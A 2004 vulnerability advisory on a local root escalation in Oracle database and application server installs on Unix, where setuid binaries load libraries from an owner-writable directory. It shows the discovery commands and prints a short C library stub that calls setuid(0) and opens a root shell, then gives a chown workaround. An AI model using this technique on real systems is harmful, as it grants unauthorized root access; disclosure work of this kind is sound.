*----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries ==========---------- * * Title:* Local Vulnerability in Oracle Products. RDBMS, IAs, etc *All Versions*. (10g not tested) * Date:* 10-05-2004 * Platform:* Tested in Linux, Solaris & HP-UX but can be exported to others. * Impact:* Privilege elevation from oracle products installation owner (usually called oracle or ias ) to root. * Author:* Juan Manuel Pascual Escriba * Status:* Vendor contacted details below. *INTRODUCTION:* Oracle Corporation (nasdaqNM - ORCL) is a world leading database software developer, claiming to develop an unbreakable software. It's products are targeted in database, application server and data mining market. *PROBLEM SUMMARY:* This software version - Oracle 8i Linux Platform - Oracle 9i Linux Platform - Oracle 8i HP-UX Platform - Oracle 9i Solaris Platform - Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3 - All versions tested in Unix platform (Universal?¿) are suitable to privilege elevation from oracle software owner ( normally oracle,ias, iasr2) to root. *DESCRIPTION* Oracle Libraries are installed owned by oracle in a default installation of the products commented above. [pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid ... drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon ... As you can see, the lib directory owner is iasr2, let's look for some setuid binaries [pask@dimoniet ora9ias_mid]$ find ./ -perm +4000 ./bin/dbsnmp ./bin/nmo [iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/dbsnmp -rwsr-s--- 1 root dba 2900980 Nov 21 14:04 ./bin/dbsnmp [iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/nmo -rwsr-s--- 1 root dba 12632 Nov 21 14:04 ./bin/nmo And now, just could see the shared objects that the binaries depends. [iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0 libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so libthread.so.1 => /usr/lib/libthread.so.1 libkstat.so.1 => /usr/lib/libkstat.so.1 .... [iasr2@dimoniet ora9ias_mid]$ ldd ./bin/nmo libnsl.so.1 => /usr/lib/libnsl.so.1 libsocket.so.1 => /usr/lib/libsocket.so.1 libgen.so.1 => /usr/lib/libgen.so.1 ..... ups, it's not posible to achieve root privileges with this binary and by this way For iasr2 user is too easy to create a so.lib, something like #include #include _init() { printf("en el _init()\n"); printf("Con PID=%i y EUID=%i",getpid(),getuid()); setuid(0); system("/usr/bin/ksh"); printf("Saliendo del Init()\n"); } *IMPACT* oracle,ias,iasr2 or iasdb users with local access can gain root privileges through oracle installation *EXPLOIT* commented above. *WORKAROUND* chown to root lib directory and parent directory. *STATUS* Oracle Security Alerts explains in an email sent 26/07/2004 that "Oracle believes that only trusted users should have access to the local iasdb user account". I have no information about a patch or a solution from Oracle Corp. -------------------------------------------------- This vulnerability was researched by: Juan Manuel Pascual Escriba jmpascual@open3s.com Barcelona - Denia - Spain http://www.open3s.com